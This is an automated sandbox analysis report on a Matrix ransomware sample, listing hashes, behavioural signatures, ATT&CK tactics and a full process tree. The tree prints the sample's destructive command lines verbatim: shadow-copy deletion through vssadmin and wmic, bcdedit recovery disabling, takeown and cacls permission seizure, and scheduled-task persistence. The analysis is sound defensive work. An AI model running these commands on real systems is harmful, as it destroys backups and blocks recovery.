Analysis
- max time kernel: 150s
- max time network: 110s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 01-05-2021 00:38
Static task: static1
Behavioral task: behavioral1
- Sample: e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
- Resource: win10v20210410
General
- Target: e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
- Size: 4.8MB
- MD5: 739562b08a6131cce604c0e7ffa1a07d
- SHA1: eabe2b22d6af539871b81625c0c3a3efb58afd90
- SHA256: e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569
- SHA512: 457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f
Malware Config
- Extracted: http://myexternalip.com/raw
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Processes:
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Processes:
- pid 4828 bcdedit.exe
- pid 4588 bcdedit.exe
Blocklisted process makes network request (1 IoCs)
Processes:
- flow 76, pid 4392 powershell.exe
Drops file in Drivers directory (1 IoCs)
Processes:
- File created C:\Windows\system32\Drivers\PROCEXP152.SYS by QhbGVYKB64.exe
Executes dropped EXE (3 IoCs)
Processes:
- pid 2448 NWNCehUW.exe
- pid 4424 QhbGVYKB.exe
- pid 2808 QhbGVYKB64.exe
Sets service image path in registry (2 TTPs)

Processes:
- resource C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe, yara_rule upx
- resource C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe, yara_rule upx
Modifies file permissions (1 TTPs, 1 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials, etc.
Drops desktop.ini file(s) (26 IoCs)
Processes:
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 75, ioc myexternalip.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes:
- reg.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\o2R6BrBF.bmp"
Drops file in Program Files directory (64 IoCs)
Processes:
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
- vssadmin.exe (PID 4416)
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
- powershell.exe (PID 4392), 3 entries
- QhbGVYKB64.exe (PID 2808), 9 entries
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
- QhbGVYKB64.exe (PID 2808)
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes (token privileges adjusted, by PID):
- powershell.exe (PID 4392): SeDebugPrivilege
- takeown.exe (PID 4148): SeTakeOwnershipPrivilege
- QhbGVYKB64.exe (PID 2808): SeDebugPrivilege, SeLoadDriverPrivilege
- vssvc.exe (PID 4504): SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- WMIC.exe (PID 4592), the following list recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes (writer PID and image -> target PID and image, with the number of recorded writes):
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 1848 cmd.exe (3)
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 2448 NWNCehUW.exe (3)
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 4348 cmd.exe (3)
- 4348 cmd.exe -> 4392 powershell.exe (3)
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 4584 cmd.exe (3)
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 4596 cmd.exe (3)
- 4584 cmd.exe -> 4684 reg.exe (3)
- 4596 cmd.exe -> 4704 wscript.exe (3)
- 4584 cmd.exe -> 4760 reg.exe (3)
- 4584 cmd.exe -> 4812 reg.exe (3)
- 2112 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe -> 4868 cmd.exe (3)
- 4704 wscript.exe -> 4948 cmd.exe (3)
- 4868 cmd.exe -> 5012 attrib.exe (3)
- 4948 cmd.exe -> 5020 schtasks.exe (3)
- 4868 cmd.exe -> 5060 cacls.exe (3)
- 4704 wscript.exe -> 5084 cmd.exe (3)
- 5084 cmd.exe -> 2056 schtasks.exe (3)
- 4868 cmd.exe -> 4148 takeown.exe (3)
- 4868 cmd.exe -> 4356 cmd.exe (3)
- 4356 cmd.exe -> 4424 QhbGVYKB.exe (3)
- 4424 QhbGVYKB.exe -> 2808 QhbGVYKB64.exe (2)
- 4216 cmd.exe -> 4416 vssadmin.exe (2)
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe"
  - Matrix Ransomware
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID: 2112

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569.exe" "C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe"
      PID: 1848

    C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\NWNCehUW.exe" -n
      - Executes dropped EXE
      PID: 2448

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\o9QjbXvE.txt"
      - Suspicious use of WriteProcessMemory
      PID: 4348

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4392

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\o2R6BrBF.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      - Suspicious use of WriteProcessMemory
      PID: 4584

        C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\o2R6BrBF.bmp" /f
          - Sets desktop wallpaper using registry
          PID: 4684

        C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          PID: 4760

        C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
          - Matrix Ransomware
          PID: 4812

    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lUcGld9y.vbs"
      - Suspicious use of WriteProcessMemory
      PID: 4596

        C:\Windows\SysWOW64\wscript.exe
          Command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\lUcGld9y.vbs"
          - Suspicious use of WriteProcessMemory
          PID: 4704

            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat" /sc minute /mo 5 /RL HIGHEST /F
              - Suspicious use of WriteProcessMemory
              PID: 4948

                C:\Windows\SysWOW64\schtasks.exe
                  Command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat" /sc minute /mo 5 /RL HIGHEST /F
                  - Creates scheduled task(s)
                  PID: 5020

            C:\Windows\SysWOW64\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
              - Suspicious use of WriteProcessMemory
              PID: 5084

                C:\Windows\SysWOW64\schtasks.exe
                  Command line: schtasks /Run /I /tn DSHCA
                  PID: 2056

    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZJXYQLRa.bat" "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""
      - Suspicious use of WriteProcessMemory
      PID: 4868

        C:\Windows\SysWOW64\attrib.exe
          Command line: attrib -R -A -S "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
          - Views/modifies file attributes
          PID: 5012

        C:\Windows\SysWOW64\cacls.exe
          Command line: cacls "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C
          PID: 5060

        C:\Windows\SysWOW64\takeown.exe
          Command line: takeown /F "C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"
          - Modifies file permissions
          - Suspicious use of AdjustPrivilegeToken
          PID: 4148

        C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
          - Suspicious use of WriteProcessMemory
          PID: 4356

            C:\Users\Admin\AppData\Local\Temp\QhbGVYKB.exe
              Command line: QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
              - Executes dropped EXE
              - Suspicious use of WriteProcessMemory
              PID: 4424

                C:\Users\Admin\AppData\Local\Temp\QhbGVYKB64.exe
                  Command line: QhbGVYKB.exe -accepteula "SmsInterceptStore.db" -nobanner
                  - Drops file in Drivers directory
                  - Executes dropped EXE
                  - Enumerates connected drives
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious behavior: LoadsDriver
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 2808

C:\Windows\SYSTEM32\cmd.exe
  Command line: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\DeYAqowH.bat"
  - Suspicious use of WriteProcessMemory
  PID: 4216

    C:\Windows\system32\vssadmin.exe
      Command line: vssadmin Delete Shadows /All /Quiet
      - Interacts with shadow copies
      PID: 4416

    C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken
      PID: 4592

    C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
      PID: 4828

    C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
      PID: 4588

    C:\Windows\system32\schtasks.exe
      Command line: SCHTASKS /Delete /TN DSHCA /F
      PID: 4616

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 4504
Network
MITRE ATT&CK Enterprise v6
Persistence
- Hidden Files and Directories (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- File Deletion (2)
- File and Directory Permissions Modification (1)
- Hidden Files and Directories (1)
- Modify Registry (2)
Downloads
-
MD5 42f915c1da6fdcb693f0e9d1257a5213
SHA1 e163d54f3af1352e8f9d6fa8a680b653d51f7413
SHA256 8c3e13364e29f3ae1e1a496c13e5ef73049573d8ac0cffcaf06506b98ef38243
SHA512 62dea5e0e07a0fb1e505418cc688e24da7fb8d76f1faf5a21aefc0576e8e387595acb84ef2c19c292dae79c4f6e1743c634d2f6e3046db82260004d86461650d
-
MD5 739562b08a6131cce604c0e7ffa1a07d
SHA1 eabe2b22d6af539871b81625c0c3a3efb58afd90
SHA256 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569
SHA512 457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f
-
MD5 739562b08a6131cce604c0e7ffa1a07d
SHA1 eabe2b22d6af539871b81625c0c3a3efb58afd90
SHA256 e724df98ce87ea905e9923017c94322059f1919d27bf6f70d38e2a353ff3a569
SHA512 457dd85e77bf9bd32275230185b7c350245729afeb7c0eaa50a52bbdc109ed41a0d9a4ecf16a186c3bf163f31e86d91060dcb7f7d64494bcb5f6ee21d8f32c9f
-
MD5 2f5b509929165fc13ceab9393c3b911d
SHA1 b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA256 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512 c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5 2f5b509929165fc13ceab9393c3b911d
SHA1 b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA256 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512 c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
MD5 3026bc2448763d5a9862d864b97288ff
SHA1 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA256 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512 d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
MD5 3026bc2448763d5a9862d864b97288ff
SHA1 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA256 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512 d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
MD5 91ed286f4d056237538808101c791754
SHA1 0b9e6909a60cc8d0130c93eb4f47d86554ecd636
SHA256 86168ac47d57624bf4a690f988ebc7eb3efbd92f7af00eb2ba25b9b23bd2235d
SHA512 9de1d2275c2d452d3f29fd384fd46ebd2b935e37443a7485b7363d527b6594f0863da1d7d5148d485f33aff7c2599d7041abcb212c62656c94ee42a8d2415238
-
MD5 75564e2df4b8c8d33695e8e5e58cb03c
SHA1 64a796a9f01a1f12bcbe641ecc92541a41ece9b5
SHA256 bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965
SHA512 c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af
-
MD5 333472c0ef584b6d6593d3aea09c4900
SHA1 116a83c732b9814f91a72c041ef510697fe5bb3a
SHA256 fd59539a17f3467364429c634f7e2b48f19b8633484ea0ace4a4be01b9c95cbb
SHA512 3e6007775b97dcbcdbcfc07e265fa5bfd5dc53f01faf10be68d19152fd17425261be02c763c8d3705c10ede06448c70f4c30d00910f03e3c36906bf1d7505a13
-
MD5 4c2bf9c3f1ac964c399edfa48f23da62
SHA1 d2a6f14e46cec004b810f8e071e82fc5730c0563
SHA256 5c97af3f32e6a6ac69d5bf8d406a49ff1949f05d2e4bcf623708176178028717
SHA512 45de4b1629e0536dc5eaf75f0ed219f319de8129fb4fbc3dce33d06978c2c04f4e78ddd40e52495b9184fba57d5161844c7fd84f0304d3db382538676444bd0f